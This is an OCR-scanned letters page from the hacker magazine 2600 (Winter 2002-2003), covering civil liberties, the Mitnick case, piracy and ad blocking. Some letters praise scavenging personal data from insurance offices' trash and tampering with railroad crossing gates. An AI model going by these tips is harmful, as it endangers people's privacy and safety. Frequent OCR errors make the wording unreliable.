way of life and all that el stands for Our Constitution
protects us from abuses of power by our government,
the very abuses that are so common by the govern-
ments of countries like Iraq which back terrorism. If
we allow our government to take away any of these
freedoms* then ihe terrorism will have won a great
victory.
In Washington it is sad to see that many politicians
who claim to support small and limited government
have worked to extend government power to such a
huge extent. The few voices of dissent have been for
the most part drowned oul At the same time though, it
has made for odd alliances. For example, some right-
wing Republicans and liberal groups like the ACLU
have found common ground in opposition to new
government powers. 1 lie only way for us to light this
extension of government authority is to find people
who think likewise in all parlies, in all organizations,
and join together to send a message to our govern-
ment dial we must not let the terrorists win by altering
our way of life.
LordKhamul
He careful not to fall into the propaganda pit re-
garding who is evil and who is not. There are many
countries with as bad or worse human rights records
as Iraq who our government supports. We certainly
don ( want to defend their despotic regime hut no de-
finitive proof has ever been presented linking them to
the attacks nor have they been caught acting aggres-
sively outside their borders or planning to since the
Gulf Wan Something else seems to be at work in our
latest drive against them.
Not that its any comfort at alt. but terrorist acts
against our people have probably got nothing to do
with our imy of life and every thing to do with what
our government is doing in our name in other coun-
tries . 77iĀ£j; makes it especially important to know ex-
actly what that is and to know where we as individuals
slant!. We also have to keep our eyes open for those
right here at home who oppose the American way
not those who dissent, speak their minds, or represent
something different. The real enemies are the ones
who are t lying to change the rules and wipe away any
Semblance of due process that hasn't already been de-
stroyed - ali in the name of their twisted definition of
patriotism. As you've pointed out , fighting this goes
across all party lines and requires only intelligence
and open minds.
Dear 2600:
1 was just reading your newest issue (1 9:3) and in
your intro {"Freedom's Biggest Enemy*) something
caught my eye. Ope rad on TIPS (Terrorist Informa-
tion and Protection System i which proposes having
members of the general public spy on people they
come in contact with, looking for anyone or anything
out of the ordinary.ā
Well. I'm no history buff but this really sounds ex-
actly like the same thing that Hitler did. I remember
reading a book land 1 can t remember which) where
[he kids would even turn in their parents for doing
something kind of suspicious. And fm honestly won-
dering. and have been wondering for a while, if this is
the direction our country is heading in. Haven't we
learned from history? 1 would like to think so, but
somehow I can't seem to convince myself we did.
Oh, but itās not like this hasn't happened before.
Ever heard of McCarthy ism? It all started with Sena-
tor McCarthy who had a list of known ' commies
working for the government. Their lives got de-
ployed, He asked people to turn in anyone they
thought was a commie, The only way oul of it once
you got called in was to name other people. If you
didn't name other people, then you were a commie
too. | Doesnāt this kind of stuff just piss you off on how
dumb people are?)
Hells-own
One thing that always happens during these dark
periods is the emergence of collaborators who go
along with such things and individuals who stand up
and fight them. One thing we can almost guarantee is
that you'll he very surprised who winds up in each
camp l
Deyr 2600:
Just wanted to let you know - your bright light is
soon to he extinguished. One more major terrorist at-
tack and your land your type s) relevance will cease,
your moment will have passed. This is the price you
will pay lor your arrogance and ignorance of human
nature and history. Thinking any societal structures
are infinitely perfectible - what dreadful nonsense.
Don't blame anyone else (da mm) for loss of civil lib-
erties - look at da man in da mirror. When security and
law and order are recklessly neglected and chaos and
uncertainty threaten, the balance of societal priorities
shifts. To quote Aragorn; "Are you scared 7 You're not
scared enough.ā Better get used to your nightmares,
they ain't going away anytime sewn. Enjoy the dark-
ness,
R$ 1 hear BuSpar is good.
KrOOIee-O
It may be a paranoid reaction hut sometimes we
get the distinct feeling that there are people out there
who don't like us.
Dumpster Diving
Dear 2600:
In response to your article on dumpster diving, in
the UK a (creepy) chap called Benjamin Pell did this
for a living, feeding info to the press and is estimated
to have made over one million pounds from it. Test
cases in the UK have decided that even though trash
has been thrown away, it still belongs to the thrower,
and is not "public domain." Funny old world.
Paddy
Dear 2600:
Just thought I'd add to Gri Tier's brilliant article in
19:2 about dumpster diving. Another great place to
dive is behind small insurance sales businesses. No
locks, no shreds, and especially, no food, I've found
stacks (big slacks) of personal info like addresses,
phone numbers, socials, credit reports, etc. Grifler
brought up a nifty idea with the cardboard boxes as an
excuse. Thai tidbit would have gotten me out of a tew
jams when I found running to be very necessary. Ap-
parently backpacks aren't a good idea either Happy
diving!
Nomad
Dear 2606:
Great article on Dumpster Diving by Grifter in
19:2, Others who are interested can join fellow divers
in the all.dumpster newsgroup in Usenet for all soils
of discussion, etc. There's a lot to learn and we share
information with all. No flames or trails, please.
Slinky
As if merely asking made the fames and fad Is gt>
away.
Feedback I
Dear 2606:
I have been following the topic of right click sup-
pression in your magazine for the last couple of issues
and decided to put my Two cents in, I am a photogra-
pher and on my website, my gallery images have right
click suppression on them. The reason for [his is
rather interesting. J feel that if you really appreciate an
image that I have and want to have a copy of it. you
should cither contact me or, even better, find a way to
work for it. This ss one of the basic parts to hacking in
my book, finding rew r ways of learning. It is not
harmful or destructive, and if you find a wav around
something, than you have learned something new.
Props to you, and keep up the good work.
Traveler
Dear 2606:
In response to Erovfs comment about script kid-
dies and the ratio of master to newbies:
The way our world is now is fine when it comes to
the script kiddies and the masters ratio. Both have dif-
ferent goals. The masters' goal is to expand their abil-
ities and show off hy creating the program.
Recognition for the program is among peers, not by
the ignorant majority shat is clueless to the true art of
anything they do. Masters are happy how they are.
programming.
Script kiddies find joy in just breaking into school
computers and by petty acts of malice that bring
recognition by the ignorant masses. That makes the
script kiddies happy.
As long as everyone is happy, what's ihe problem?
XiChimos
We weren't aware that everyone was so happy.
Perhaps we could join in a chorus of Ode To Joy if the
people committing "petty acts of malice " stopped call-
ing diem selves hackers to the ignorant masses .
Dear 2600:
I just finished watching Freedom Downtime two
minutes ago. I finally got around to ordering it and as
soon as I got home and saw that package in my mail 1
opened it up and popped it in ihe VCR, I just want to
say I thought it was great, I especially enjoyed the Mi-
ramax protest and your across the count ry trip to gel
the word out about Kevin I plan on making copies
and giving them to my friends; 1 also hope to have a
showing at my school. Thanks for taking the lime to
make such a great film and keep up the good work.
joe
Dear 2600:
l just read the article in 1 9:2 about doubleclick. net
and how evil it is, as w^dl as the letter with a solution
involving iplables. This is all fine and dandy, but h
Page 32
2600 Magazine
definitely looks like killing a dog with a cruise mis-
sile. The first thing [did was start up Moz.il la and see
what it had in its preferences, and I saw that nut only
does Mo/.db have reasonably flexible coolde block-
ing stuff, it has image blocking stuff as well. Here's
the easy two-step process that doesn't require firewall
software or root access {a definite selling feature on
those lovely university unix labs):
L) Change your cookie setup. Only accept them
from the originating web sire and lell it to ask before
storing a cookie. Mozilla can remember your decision
about cookies, so the dumb popups are a one-tune
affair fur sites you visit regularly.
2.) Find a site with doubledick.net ads. 1 googled
for ' funny puppies " and won on tny first try: block
images from this site" on the ad ( right dick, duhl, I'm
moderately annoyed that dicy didnāt let you add sites
to block images from in the preferences menu, but
you can't win them all, I guess,
1 don't know what they manage to squeak by wulh
javascript, but Mozilla lets you disable javascript's ac-
cess to cookie data, its ability to make cookies,
change images, and so forth, so it can probably be
mostly curbed. The preferable solution would be to
ignore javascript and images based on a configurable
list of keywords.
Opera lias similar features, but I don't think theyāre
as Complex. IE's approach to this seems to be along
the lines of telling the user, ā'don't try to hide from my
money grubbing masters or I will crash your
computer" I havenāt checked konqueror yet.
Bob M.
Dear 2600;
This is a response to a letter written by que! in
19:2 which suggests blocking web ad images by
adding each image server IP to Linux net filter rule ta-
bles, ['here are several much easier ways to block ads,
such as:
L) Add the server's name and the address
1 27.0.0. 1 to your /etc/hosts fife. (Windows has a hosts
file too at C:\windowsMiosts or C:\wmnt\system32\div
ven5\etc\hosts.)
2.) Use a browser (such as Mozilla) or browser
plugin that can give you better control over the im-
ages that the browser downloads and displays.
3.1 Most importantly, try out a personal web proxy
such as Privoxy. Adzapper, Web Washer, or
Guide .scope. If you haven't heard of any of these,
Google is your friend.
Eil
Dear 2600:
Thanks for publishing so much discussion of the
gun control issue. Despite the fact it is not directly
connected to hacking or freedom of information, your
readers seem to be very interested in it. Iām a new
reader who picked up a bunch of back issues at H2K2.
and I've been following the debate backwards to 18:3,
I'm sorry you don't support the right to bear arms the
way, say T American Rifleman (the main NR A maga-
zine) supports f reedom of information.
1 would like to point out a nonsense statement: If
only hackers were treated as well as gun owners in the
United States!" Violation of (he DMCA of 1998 car-
ries a penalty of up to five years in prison for a first of-
fense. Violation of the NFA of 1934 (for example
owning what the DoD calls an assault rifle, sawing off
a shotgun, or making your own gun of any kind) car-
ries a penalty of up to 10 years in prison. I also feel
(although this is more subjective! that the plethora or
laws governing firearms ownership are more onerous;
I've never been fingerprinted in order to buy a packet
sniffer, or had to appear in person at the sheriffs office
lor a license to carry a password hash cracker. I do not
risk live years imprisonment for forgetting to dear
some software oft my laptop when 1 go to visit my
parents in New Jersey; if [ accidentally leave any
standard hunting ammo in my car, 1 risk (hat,
Charles
if you an like an idiot with deadly weapons, you
should he prevented from continuing to do so. It's
amazing how many people sec that as a violation of
their rights yet will blindly support idiocy like the Pa-
triot Ait without a second thought* What we don 't sup-
port is the attitude that anyone who suggests any form
of regulation of firearms is somehow advocating dis-
arming the populate, no dtmht in furtherance of some
hidden agenda, ft's an hysterical reaction that only
manages to demonstrate how had the problem is .
There are ail kinds of legitimate reasons to own guns.
But. being deadly weapons, they cannot conflict with
the needs of society. That's why we frown upon walk-
ing around schools and churches with firearms, re-
gardless of what you think the Constitution says you
can do. It's why deranged individuals rend to he dis-
couraged from becoming gun hobbyists. These direc-
tives ore coming from the people, not from some
invading go verrm tent.
If we can get major politicians clamoring for the
rights of hackers and the "National Hacker Associa-
tion'' challenging the government to pry our key-
boards * from our cold ' dead hands " then maybe
hackers will have a chance of being treated better
than gun owners , Until that day, it's an absurd
comparison .
Dear ^Aft-
Regarding the cover of 19:2. 1 was wondering it
that "building" that kinda looks like the U N. is actu-
ally an integrated circuit that I've seen in some touch-
tone phones from the 70s and 80s, and the nound
"building - ' being a receiver or speaker of some sort Is
that right' 1 S noticed because die "hu tiding" is not fac-
ing die same direction as any of (he others, Nicely
done! Thanks for your magazine - love every minute I
read it.
ShadowfaxO
You're -very observant. But we really don 't deserve
the credit this time The round building is actually
Madison Square Garden with the surrounding ones
being part of the Pennsylvania Station complex in
Manhattan. Across the street (in the middle of tin
cover) is the Hotel Pennsylvania which is where tin.
HOPE conferences are held . A trained eye can see the
little bridge that hooks Two of the conference rooms
on the top floor together.
Dear 20Aft*
1 am a 2600 subscriber. Recently by chance I
viewed Freedom Downtime on Free Speech I V
2600 Magazine
tFS rV) and was amazed to learn about the details of
Mr. Ke vin Mitnick. The reason for my letter is to basi-
i ally express my opinion on the case.
First of all. where is the American Civil Liberties
Union? H a ve \ he y i gnore d M n M i tnick ' s e ase ? Tl us is
Lie finitely a case for the ACLU.
Needless to say what Mr, Mitnick had to endure
w as unnecessary and illegal, l feel that the film should
have concentrated a lot more on die constitutional is-
sues and made it clear that one of our inalienable
rights given to everyone Living in the United States of
America by the U S. Constitution (the supreme law of
the land] is the right to a speedy trial.
VVhat f fill! to understand and what the film does
not fully explore is how any jurisdiction was able to
keep a man incarcerated lor such a long time without
a I rial. The film leads me to believe that Mr, Mitnick
was deprived of his freedom until he acquiesced lo a
guilty plea. Is this (he case? Was the government
holding him hostage in exchange for a guilty plea?
Should (his be (he case, then the entire movement
and Mr. Mitnick should tile suit against ail parties in-
volved in the unlawful detention, and the civil liber-
ties and constitutional abuses toward Mr. Mb nick.
The film concentrated heavily on what Mr, Miinick
did not do. on the lies various writers were writing
about, on the hacker community, and Mr. Mimick's
detention without a trial? But I believe it failed to
drive the nail down to the core by not mentioning the
constitutional erosion his case represented and (he
danger of his situation for the sake of all Americans.
Please do not get me wrong, \ respect all of the
hard work that went into the film and the movement
.is a whole, I am just offering a perspective which I
believe would gel a stronger response from the legal
and politicaJ community. I would not w r ant to think
that all of the hard work of the civil liberties move-
mem of (he 1 960s or (he injustices and (he suffering of
those who then fought very hard to keep (he integrity
of the U S. Constitution and (he Bill of Rights were
suddenly fuTgnlten when Mr Miinick was denied his
freedom, placed into solitary confinement for eight
months, and left incarcerated lor about four years
without due process!
Any state representative, Senator, or Congress-
man should hear Mr. Mitnick's story and all parties in-
volved in this abusive behavior should be prosecuted,
! his is of paramount importance. Perhaps I am naive
i rid 1 have loo much faith in our Constitution and 1
cannot begin to imagine how these abuses could have
been so blatantly executed by the authorities.
Any competent constitutional lawyer should have
been able to have him released. It is very very difficult
I nr me to believe the events as they were explained in
the film. I greatly respeci (he effort, time, and energy
that went behind (he scene and (he entire Free Kevin
network. However I cannot understand why one of the
unwl powerful weapons and protection {(he U.S, Con-
ditulion) was never mentioned in the film.
Mr Mitnick's lihcrty as well as all of our liberties
i iv at great risk. His case should not be forgotten and
h 3 rev Kevin movement should evolve to the next
U vc I. A level of awareness, education, and realization
here his case should be made known on legal fourt-
Winter 2002-2003
dations and the indisputable truths should he ad-
dressed Eind examined by professionals as well as po-
litical representatives of the people (there are still
some honest ones out there). A level where die legal
system should take slops to correct itself and publicly
admonish those who were involved in this case Oth-
erwise we are all in great trouble.
1 conclude where ] started. Where is the ACLU?
hawk 20041
AH of the questions you asked are ones that we
also struggled with thtvughout the making of the film,
IPs frustrating not to get clear and definitive answers ,
And we wish it were that easy to actually get justice
offer demanding it. For now. we 7/ have to settle for
trying to educate the masses. Phase help spread the
word and maybe you'll manage to get some sort of re-
spot i sc from th ose responsible.
Dear 2600:
1 have to commend Kevin Mitnick and William
Simon for their amazing book: The .Art of Deception.
We have begun living tn an era of secrecy and of sus-
picion, and still the weakest factor in any situation re-
mains the human element. It's hard to give this book
just praise without sounding like an advertisement.
Amazing work, Kevin, simply amazing.
Poetics
Dear 2600:
Iāve picked up your last four issues and have found
myself sincerely enjoying them because of your lack
of bias. In journalism it's difficult to separate your per-
sonal feelings toward a subject from the writing you
do on it, and 2600 is mainly focused on topics people
feel strongly about. But what makes your publication
superior, or unique in any case, is that you usually
can't be caught puitiug down other people's views or
campaigning your own. I t s the mark of a well (bought
out organization of articles that allows your quarterly
to maintain a calm composure during days of civil un-
rest.,. days that wont end while we are alive simply
because (he public remains apathetic while power-
hungry fat cats grow fatter. Iām not going to the ex-
treme here - insurrection is only necessary when we
agree it s necessary, bu! readers and writers of your
publication seem to be of the intelligent group that un-
derstands their rights and wonāt give them up without
a struggle.
Nietzsche
Thanks for the kind words but we are most defi-
nitely biased, ft's really impossible not to he. espe-
cially with this kind of subject mutter. What's most
important, as you point out, is to respect other opin-
ions . , Otherwise, there's little chance of a meaningful
dialogue.
Dear 2600:
What's up with publishing an outdated article on
shopping cart flaw s ( 19:3)7 The flaw that Mr. Moore
discusses has been around for as long as I can remem-
ber and has been fixed, for the most part, by shopping
can authors that are worth anything. As a former site
designer/ tret work admin 1 ran into iliis problem with
some shopping cart software way back in 1998. \ con-
tacted the author and the problem was patched up
Page 34
Page 35
within days. I r m wondering if Mr. Moore has in-
formed i lie company in die article about their prob-
lem? If not, as an ethical "hacker." I think that would
be the honorable thing to do. Our job is to help people
team from their mistakes, not punish them for k, r
JaMmSr
We exist to report on discoveries and findings.
Anything beyond that , good or had. is extracurricular,
A s for this article, vou seem to be against its being
printed regardless of whether or not it w.v outdated.
If ai! of the hugs were fixed before we printed them t
(hen we would indeed he printing outdated info and
getting more complaints like yours , Hut non -outdated
info leads to implications { like yours) that weāre pun ā
i siting people and not being ethical. It seems we vanāt
win.
Dear 2600;
Thank you for your reply to my letter regarding
people's saved email tiles being shared on Kazaa,
While I don't agree that reading other peopleās email
which they are sharing is clearly an invasion of pri-
vacy" in the same way that reading private mail my
neighbor posts on a billboard on his front lawn would-
n't be. 1 respect your opinion on the matter. Also, I
should have added that it's always best to email those
round affected and Jet them know they're sharing the
wrong stuff. l r vc gotten both thanked and threatened
in response to that, which is nice.
Rob T. Firefly
We didn't mean to unply that the privacy invasion
was your fault. And what you did certainly isnāt a
crime , But those who go around using other people s
stupidity to invade their privacy are still invading
their privacy, albeit in a passive way much like listen-
ing in on private phone rails broadcast in the clear
By letting the world know you performed a valuable
service.
Dear 2600:
This is in response to HJH's article Pf A Nasty NT
Bug" in J9;2. I'm happy lo ssy that the bug reported in
the ankle has been patched. Whereas 1 an unsure
when Win 2000 was patched f Win XP was fixed by
$T>I. Also, the current Beta of Win NET is com-
pletely immune from this hug. I guess it just goes to
show, when 2600 talks, Microsoft listens. Good show,
and keep up the good work.
Jason Argonaut
It's quite possible this was reported in some other
way but thanks for the good thoughts.
Dear 2600:
I agree w ith the philosophies of your magazine on
one level- I've also noticed it is easy to get caught up
in. And sometimes I find myself agreeing w ith what
you advocate and other limes questioning it, While I
love the info, 1 have to question it. If we never ques-
tioned. we would all be sheep. While 2600 is defi-
nitely an authority in the hacking world (or
underworld if that is easier to swallow k I urge the
readers lo mill over and ultimately question what they
read. Because even if they are fellow hackers, you
don't have to agree with them or their ideals. And as
idealistic and good-sounding as 2600 is, that doesn't
make it 100 percent correct. I'm not accusing 2600 of
anything. I'm just saying that you should question
everything to make sure it works lor you. Being
spoon-fed by other hackers is the last tiling we need.
Question This. Question Life. Question Star Trek. But
more importantly. Question Everything.
Resurrect ion 20
We couldnāt agree more . Unquestionably,
Injustice Department
Dear 2600:
While you may feel like this letter is an attempt at
someone using you as a soapbox to rant ahout repres-
sion of their right of free speech, it is actually my ac-
knowledging some intriguing similarities between
your lawsuits and my job (if that makes any sense).
I work at an adult video/loy store in California in a
town of less than 10,000, although we serve approxi-
mately 100,000+ clientele from all over the area. Due
to recent events, our store will be forced to shut its
doors forever due to ignorance and hatred aimed at us,
simply because we are looked down upon by our local
government and several religious circles. In more de-
tail. the town government instated a law that prohibits
any adult related shops from conducting business
within 20(H) feet of a school and 1 500 feet from any
church. This is ironic because we are two blocks away
from an elementary school and four blocks away from
our local Presbyterian church, and the bw was
instated two years after we had opened!
Anyway, our store has always obeyed the strict
laws that the state regulates our industry by, and we
have always been in cooperation with these as well as
any city ordinances, wutli exception to the one stated
because of obvious reasons. We have been in constant
court battles, won every single appeal, and still our lo-
cal government has us in their crosshairs.
The clincher here is a recent overnight arson at-
tempt on our store which did approximately $45,000
in damage and also ruined our already tarnished im-
age w r hen the newspapers printed the city's response
to it: "That is the kind of people that ****** Video
World attracts, h is their own fault tor bringing
lowlife trader trash mu> the city, and they get no sym-
pathy from us." That is directly out of our local
newspaper
The store owner decided u> shut down in October,
l now have to take two jobs to match the salary l
was making in order to keep rent and afford tuition.
My insurance has already been canceled and l have to
pay $95 every other week for a bottle of insulin so E
can live. Yet the most hurtful thing of all is that I have
lost dose friends, some family members have turned
their backs on me, and I have even been refused ser-
vice at a local grocery store because the owner knows
where I work!
And why exactly? Religiously influenced and bi-
ased government taking a stranglehold on a privately
owned adult shop simply because they decided to
conduct business. Not because they did anything
wrong, hut simply because it existed and certain
people didnāt want it to.
2600 Magazine
All the best with your endeavors. Thanks for
it I ling like it is instead of how they want us to think it
is.
deejayredlOO II
We have no doubt (hut some of our readers will
disagree but we find the above treatment all too com-
mon and symptomatic of some serious problems in
our culture. Unless you were soliciting customers
from the elementary school or leaving brochures in
the pews of the church, you should have been treated
as any other member of the community. This kind of
coexistence happens in other countries all the time
n ithout any adverse effects. We, on the other hand,
stent to he moving ever closer to a fundamentalist
hell.
Dear 2600:
Thought 1 would tell you guys about my web host
and how they have annoyed me. They were line for
about half a year, then suddenly a few days ago my
site disappeared. All the files have been deleted and
ill that is visible is a placeholder I have been locked
ā tut of the admin interface, too. What annoys me is
that I had no warning, no explanation, and no chance
of backup- It simply switched off. I have tried contact-
ing them. They won't get back to me via email and
their phone number doesn't work, ll is companies like
these that really disappoint me. It's gotten harder to
find decent, proper companies that don't treat
customers as if they were meaningless.
Mart
There are a couple of lessons here. Always keep
vrmr own backups . Never rely on people you don't re
idly know to do anything except cash vour checks.
\tul whenever possible, try to run your site yourself
That way , the most you can lose due to someone else 7
uu ornpetence, ill will, bankruptcy, etc. is a temporary
loss of bandwidth.
Dear 2600 :
I work as a delivery driver here in North Carolina
.md I usually gel home rather late, 1 live in a fairly
small town (2,000 residents and 10,000 college kids)
and my car is very easily identifiable by the numerous
computer related stickers on the back of it. I was
slopped by the law at a license check,., a fairly routine
happening. They looked at my license and (hen asked
me to pull off to the side - an officer would be with me
shortly? 1 After waiting for ten minutes, the officer
ho pul me aside asked me to step out of the car. Now
i vmember, I am a delivery driver, and common sense
would tell you that 1 have a valid driver's license and
also that I would not be under the influence of any
Ltbstance t perhaps caffeine?). So naturally, l was a hit
puzzled by this. He then aske d me if he could search
my car and of course I said (in a polite fashion), "No.
you may not. I do not feel that [here is any reason for
vou to search, and certainly no probable cause " Qh t
but this officer found probable cause... there was a
lack of 2600: The Hacker Quarterly in my back seal
I uing from 1998 through 2002. He said that this was
a "suspicious magazine 1 ' and he was baffled that I
ā a on Id even think to have such a thing in my posses-
ion. I told him that I did not believe this was any rea-
< m or cause to search my car* so he called one of his
Winter 2002-2003
hoys over. They told me that I was interfering with an
officer's line of duly and that I could be thrown in jail
for such behavior, t am not one to get thrown in jail
(especially at the age of 18, still living with parents),
SO / stepped aside. After a 30 minute search, they de-
cided the car was line and there was uo reason to hold
me any longer. They even had drug dogs there to sniff
everything out.*. looking for that kilo of cocaine that
every cop just JbfflH-s is in there somewhere. Needless
to say. I think that this is a perfect example of what the
media has done to "hackers" and the image they have
drawn of us. I would love to press charges, hut being
an 18 year old entering college, I simply don't have
die funds.
Evnglion
You acted entirely properly by questioning them,
keeping your cool , knowing when to hack down , and
letting the world know what happened. Unfortunately
this kind of thing will continue to happen. It s always
a goud idea to get as much information as possible
from the scene ear number , ; bculge number, names,
etc. in the event that you decide to pursue matters
later Most people choose rtof to and we completely
understand why*
Dear 2600:
First off, great magazine - you've managed to in-
form the hacker world of many new laws, news, ideas
that otherwise we wouldn't experience through main-
stream media, I had closely followed your trouble
over the domain fuckgeiieralmotors.com Upon hear-
ing this* l too was outraged that because a big corpo-
ration saw' some offense to this* they should go strip
away a component to our First Amendment. So in
support of your effort, I registered www.generalmo-
LorssLicks.cjb.net. I successfully maintained the site
w'hich I Linked to ford.com. But not too long ago. I
found that my page had been shut down without no-
tice. my password to my account was invalid, and I
have had no contact from any .cjb rep I am consider-
ing filing a law-suit or at least notifying the public of
this so they can also voice their concern. Any
thought/ word would he appreciated,
ini .source
Since you re using this company's name, they have
the ability to simply disconnect you (although they
seem rather immature for doing it the way they did). If
you want to make any kind of statement using a do-
main name, you should register the entire domain
name under .com, .net, etc. and then find service
through the provider of your choice. If they shut that
ojf r itās a much bigger issue.
Dear 2600:
i was in Wal-Mart in Hammond, Indiana the other
day - the day the Spider-Mart DVD and VHS came
out. So J figured I'd go pick up a copy as long as 1 had
the cash. So I walked over to electronics and stood in
line. Note that l am 14 years old and I look more like
16. I asked to huy the Spider-Man DVD (they had it
behind ihe counter) and they said You have to be 17
or older with ID to be able to buy this movie." Now
ihe movie is freaking rated PG-I3 and to lop it off
they had the VHS sluing right on shelves near the
cash registers outside electronics and by music m
Page 36
Page 37
electronics. Why in the hell would [hey card me for
Spider-Man ? Just another case of morons power
abusing.
Dime Tanaka
Definitely moronic behavior, if you re not in she
mood for a confrontation with the store manager, we
suggest writing o polite hut firm letter to She main
headquarters telling them of your unpleasant experi-
ence. Oftentimes this leads to some sort of resolution.
Dear 2600:
l gave a speech today at PM 1 and started by show-
ing people how easy it is to get on wireless lief works
even those that are encrypted. I'm scuta nervous now
that I'll be hauled away in a black van tonight. J just
fell the need to write something in case I'm never
heard from again!
It's a shame tit at we must live fearing that our aca-
demic works will come back to haunt us.
(1 also plugged 2600 during the speech.)
Todd
That's right, drag us dow n with you .
Thoughts On Piracy
Dear 26m:
1 am an avid software pirate. Much of the software
that I use is pirated because 1 am one poor bastard.
However, being a software developer myself, 1 realize
the importance of getting what is due for your hard
work Wail a minute? Huh? How can I develop soft-
ware and condone piracy? I lene s my thinking on the
matter. First of ali, when I benefit in any way other
than purely educational, 1 make a point ol purchasing
a full copy of whatever program I'm using, i had a pi-
rated version of Dreamweaver for quite awhile. When
I finally started posting real web pages developed in it
1 purchased the full version \ Version 3. hut that's good
enough for me right now). I also have a pirated copy
of 3D Studio Max that I've had for years. The version
L have is old. but I have fun with a L Will I ever use it in
a professional sense 1 No, Should t pay massive
amounts of money to use something that l just fart
around with on occasion? I don't think so! Does Lhe
developer lose out because I didn't pay for my copy?
Lefs pul it this way.,, if I were forced to decide today
between keeping it and paying the money, or giving it
up. itād be no contest. I'd give it up, 1 don't need it that
bad. I'd never used it in a way to justify the price. So
what does the developer lose? Money that they'd
never have anyway if their program were completely
pirate proof? If the day comes, and I doubt it will,
when I use what 1 create in IDS Max for something
more than idle fun, HI pay for it. Until then, t see no
loss by anyone. 1 hope others use the software I create
in the same manner
II269U
Questions
Dear 2600:
Does your magazine have any competition in it',
class? I'm sure you know many magazines do have
competitors, however I've never seen competition lo
yours. I'm not trying to suggest anything negative
about your magazine. !i may took as though I am. I
just enjoy this, type of leading material and I gel
through your magazines pretty quickly because of
that,
Super-Fly
There are plenty oj Internet zines out there hut we
haven 7 found any other paper publications that are
devoted to the hacker world. Occasionally we see an
abortive attempt. They usually don't succeed for a
number of reasons - they try' to get too big too fast ,
they get spooked by the legal threats and hate mail, or
they simply realize what a commitment if really is. Wtr
need a good deal more zines covering this stuff nor
just here hut all around the world.
Dear 2606:
I just read the article on 802.1 lb ( 19:2) and it told
me 99 percent of everything 1 wanted to know about
802.11b networks except for the one thing l really
wanted to know. In the article it said they used a
' magmount antenna on the roof " How do i hook this
up to the card - or does the card just use (he antenna
through osmoses? I would love to scan the surround-
ing area, but need signal strength.
In a TrAnCe
Many 802.11 cards have antenna jacks an them
but for those that don't you're pretty much out of tuct
Yon may want to ask google about your card and an-
tenna jack" to see if there is a way you might add one.
but its gem- rails not a reliable hookup. Even so.
youāll almost certainly need an adapter ( commonly
called a pigtail") to go from your antenna s jack
(probably an " N " jade look for pictures) to your
card s jack (probably SMA ),
Dear 2606:
I was wondering why there is something strange
on page 33 at the bottom of the page where it should
say "Page 33?" Each time there is something different
but it is never correct.
QuielSIuidow
We get more mail on this than on an\ other subject
by far. And yet, everyone who writes in seems to knttw
what page number theyāre talking about even though
they claim the page number information is faulty! It
defies all togas
Dea r 2600:
f have a folder on my computer that 1 cannot open
or manipulate in any way. It is Located in my CA drive
and when 1 double-click it. an error message pops up
that says ' This folder docs not exist. " Can you tell me
what has happened 1
Phule_2k2
Your problem appears to he that youāre running
Windows. Other than that, this is one we weren't able
to find an immediate answer for. Well let you know
what we find.
Dear 2600:
I was wondering if you could please tell me who
is the man on the right side of cover 19:3 Also if you
could please enlighten me as to what 'might'' be on
the disk and roll of film. Keep up ihe gtn>d fight - bo!
cause of you the ideals and principles of many have
been changed.
Quiet Riot
Answering these questions would undoubtedly
lead to more questions and the need for more an swers
and a possible Semite inquiry: Letās just say it's a
pretty picture and leave it at that.
Dear 2660:
Maybe 1 have something wrong or have misunder-
stood H R, 54b9, Why are radio stations that broad-
east an EM signal to my car allowed to continue to
simulcast over the Internet with no proposed legisla-
tion against them? Why have the Internet radio sta-
tions been singled out? Did \ miss something?
ddShelby
Any Interne? broadcast is affected in some way.
Broadcast stations are no exception. But it sen es to
prove the absurdity of the legislation as broadcast sta-
tions can have as many people listening to them over
the airwaves as they can get without incurring any ex-
tra fees. But jot every listener on the Internet (which
id ready carries a bandwidth cost for each stream), an
additional fee is levied Imagine what would happen if
stations were charged that fee for every listener esti-
mated by the Arbitral ratings sen' ice. The most popu-
lar stations would probably go broke. { Maybe itās not
such a bad idea. )
Dear 2660:
I was wondering if an article about OfficeMax
would be of interest. I've read the articles about Radio
Shack and recently the one about Target, and l was
v ondering if your magazine would he interested in an
i i ide about OfficeMax, Things such as store security,
breaking through [he security on the HP Custom
1 ompuler Centers/logging in as administrator, the
mi ix terminals, and other related topics. 1 would be
in tc than happy to submit such an article if it w r ould
In of use. Please let tne know so I could gel started,
thank you.
(ianjaf I
if we print an article about one retail outlet, natu-
ā dt\ we're interested in others. That's not a guarantee
Ā« we'll print this specific article hut the topic cer-
ntdy qualifies. The general rule of thumb is that If
m tm i e an article to write, just write it and send it
We may not print it but at least you will have writ -
i *! a which is generally a good thing to do.
nr ar 2660 :
f ihink that your magazine is the greatest, I read it
ill du time at my local Chapters Bookstore. \ always
v I n cover to cover. It's the best.
I have a situation that 1 don't know what to do
ii hi my neighborhood we have a fun game. We
i ms on the railroad tracks to make the traffic
i rn i mu come down. The winner is the one who
ā¢ A the longest lineup of cars.
I i i week I was sure f would win the contest. I
i . i ii i busy day at 5 pm, I did everything properly. I
: and came back an hour later to make sure